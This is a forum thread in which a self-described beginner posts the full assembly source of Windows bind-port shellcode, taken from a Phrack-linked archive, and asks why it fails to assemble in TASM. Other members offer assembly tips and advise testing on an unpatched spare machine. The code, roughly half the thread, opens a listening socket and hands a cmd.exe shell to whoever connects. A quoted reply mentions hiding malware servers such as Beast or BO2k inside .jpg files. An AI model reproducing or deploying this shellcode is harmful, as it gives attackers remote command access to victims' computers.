Results 1 to 9 of 9

Thread: exploits and asm :getting started.

  1. #1
    Senior Member
    Join Date
    Oct 2004
    Posts
    122

    Thumbs up exploits and asm :getting started.

    phrack 6.2's article on advances in windows overflow http://phrack.org/show.php?p=62&a=7
    is great some really advance topics covered by it gives u examples on how to procede and source code available on http://www.scan-associates.net/papers/one-way.zip

    i am new at asm never enjoyed it to be honest but in one-way.zip file there are source code in asm for shell codes here is one of those source codes:::

    ----------------------------------------------------------

    ;bind to port shellcode
    ;port at 0x134
    ;sk scan-associates net

    .386p
    locals
    .model flat, stdcall

    .code
    start:

    db 0ebh,02 ;jmp $+2
    db 0ebh, 05h ;jmp $+5
    db 0e8h, 0f9h,0ffh,0ffh,0ffh ;call $-7

    pop eax
    add eax, 1bh
    lea esp,[eax-3ffh]
    and esp, 0fffffffch
    mov ebp,esp
    xor ecx,ecx
    mov cx,399 ;size
    decode:
    xor byte ptr [eax], 0
    inc eax
    loop decode
    call here

    db "GetProcAddress",0,"LoadLibraryA",0
    db "CreateProcessA",0,"ExitProcess",0
    db "ws2_32",0,"WSASocketA",0
    db "bind",0,"listen",0,"accept",0
    db "cmd",0
    ;Warning! This will not work in Win2k SP4! Check reverse.asm for a better trick to get Kernel32
    here:
    pop edx
    push edx
    mov ebx,77F00000h
    l1:
    cmp dword ptr [ebx],905A4Dh ;/x90ZM
    je l2
    ;db 74h,03h
    dec ebx
    jmp l1
    l2:
    mov esi,dword ptr [ebx+3Ch]
    add esi,ebx
    mov esi,dword ptr [esi+78h]
    add esi,ebx
    mov edi,dword ptr [esi+20h]
    add edi,ebx
    mov ecx,dword ptr [esi+14h]
    push esi
    xor eax,eax
    l4:
    push edi
    push ecx
    mov edi,dword ptr [edi]
    add edi,ebx
    mov esi,edx
    xor ecx,ecx
    ;GetProcAddress
    mov cl,0Eh
    repe cmps byte ptr [esi],byte ptr [edi]
    pop ecx
    pop edi
    je l3
    add edi,4
    inc eax
    loop l4
    jmp ecx
    l3:
    pop esi
    mov edx,dword ptr [esi+24h]
    add edx,ebx
    shl eax,1
    add eax,edx
    xor ecx,ecx
    mov cx,word ptr [eax]
    mov eax,dword ptr [esi+1Ch]
    add eax,ebx
    shl ecx,2
    add eax,ecx
    mov edx,dword ptr [eax]
    add edx,ebx
    pop esi
    mov edi,esi
    xor ecx,ecx
    ;Get 3 Addr
    mov cl,3
    call loadaddr
    add esi,0Ch
    ;Load ws2_32
    push edx
    push esi
    call dword ptr [edi-0Ch] ;LoadLibraryA
    pop edx
    mov ebx,eax
    xor ecx,ecx
    mov cl,4
    call loadaddr
    add esi,7
    xor eax,eax
    push eax
    push eax
    push eax
    push eax
    inc eax
    push eax
    inc eax
    push eax
    call dword ptr [edi-16] ;WSASocketA
    cmp eax,0FFFFFFFFh
    je exit
    ;bind, listen, accept
    mov ebx,eax
    mov word ptr [ebp],2
    mov word ptr [ebp+2],5000h ;port
    mov dword ptr [ebp+4], 0 ;IP
    push 10h
    push ebp
    push ebx
    call dword ptr [edi-12] ;bind
    test eax,eax
    jne exit
    inc eax
    push eax
    push ebx
    call dword ptr [edi-8] ;listen (soc, 1);
    test eax,eax
    jne exit
    push eax
    push eax
    push ebx
    call dword ptr [edi-4] ;accept
    cmp eax,0FFFFFFFFh
    je exit
    mov ebx,eax
    xor eax,eax
    xor ecx,ecx
    mov cl,11h
    push edi
    mov edi,ebp
    rep stos dword ptr [edi]
    pop edi
    mov byte ptr [ebp],44h
    mov dword ptr [ebp+3Ch],ebx
    mov dword ptr [ebp+38h],ebx
    mov dword ptr [ebp+40h],ebx
    mov word ptr [ebp+2Ch],0101h
    lea eax,[ebp+44h]
    push eax
    push ebp
    push ecx
    push ecx
    push ecx
    inc ecx
    push ecx
    dec ecx
    push ecx
    push ecx
    push esi
    push ecx
    call dword ptr [edi-24] ;CreateProcess
    exit:
    push eax
    call dword ptr [edi-20] ;ExitProcess
    loadaddr:
    mov al,byte ptr [esi]
    inc esi
    test al,al
    jne loadaddr
    push ecx
    push edx
    push esi
    push ebx
    call edx
    pop edx
    pop ecx
    stosd
    loop loadaddr
    ret

    end start

    .data
    ----------------------------------------------------------
    it is supposed to be used with TASM i have windows 98 and XP installed tasm on 98 and tried all of these source codes tried to create obj file but it doesn't work can anyone suggest why?
    may be it will work fine on linux but what if i want to convert this to windows or dos format.
    nobody is perfect i am nobody

  2. #2
    Senior Member
    Join Date
    Oct 2002
    Posts
    4,055
    Bleh I'm prolly acting like a dick like this because it's late and I hate ASM but: this should really be in programming security. Anyways, that phrack article (to my knowledge) is old and outdated and the exploit you directed to might even be patched (probably is).
    Space For Rent.. =]

  3. #3
    Senior Member
    Join Date
    Oct 2004
    Posts
    122
    i don't care whether it is patched or not i just want to learn
    nobody is perfect i am nobody

  4. #4
    Senior Member
    Join Date
    Oct 2002
    Posts
    4,055
    Indeed, I'm thrilled your looking to learn ASM and whatnot. However reading outdated/old material isn't the way to go, no? Search AO and google for some ASM tutorials (as a matter of fact, AO might have some links to some programming tutorial sites that are updated and aren't outdated.. I can't remember any off the top of my head right now).
    Space For Rent.. =]

  5. #5
    Senior Member
    Join Date
    Oct 2004
    Posts
    122
    i did that i am starting with asm.got some cool links from google tried art of assembly and so on.
    as far this thread is concerned i just wanted to know why i am not being able to run it with TASM in win98?
    nobody is perfect i am nobody

  6. #6
    Senior Member
    Join Date
    Oct 2002
    Posts
    4,055
    /me wishes he could help you with that one, but can't because me dont use/code with ASM.
    Space For Rent.. =]

  7. #7
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    Any error messages?
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  8. #8
    Originally posted here by SirDice
    Any error messages?
    Huhaha... nice joke, SirDice. That was a good one.

    Well for starters and among various other potential problems, when you declare byte(s) of text like that it should be
    .data
    db "blah blah random text", 0
    It should go to the .data section of your source which is at the bottom of your post, the text is somewhere in the top/middle area of it all ... which really stuff like .data, .data?, .const, and (ect) this would all normaly be prepared, declared, ready, & done before you begin the .code portion of the source code. Oh yeah and Spyder, kiss my ass! Go do something lame and imaginary like bind a *.jpg file with beast or BO2k servers.
    Originally posted here by Spyder32
    No doubt. You most like FIND viruses inside of a .jpg file because it's harder to detect and/or wouldn't be thought of as containing a virus. Their are specific binding applications out there designed to bind two files together, specifically a .jpg and a .exe. Hope that provided some insight for you.

  9. #9
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,188
    littlenick,

    i don't care whether it is patched or not i just want to learn
    Well you ought to care. If the machine is patched then the exploit won't work, and if it is your primary computer that you use to access the net it certainly should be patched. Or you will certainly learn.......the hard way!!!

    You need to get yourself an old box, PI/PII or even a later 486. Load an UNPATCHED version of an OS such as Win NT4 or Win98. Then try your experiments. Then gradually apply the patches and see what they do.

    You certainly don't want to be doing this sort of research on your main machine............things can go wrong.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •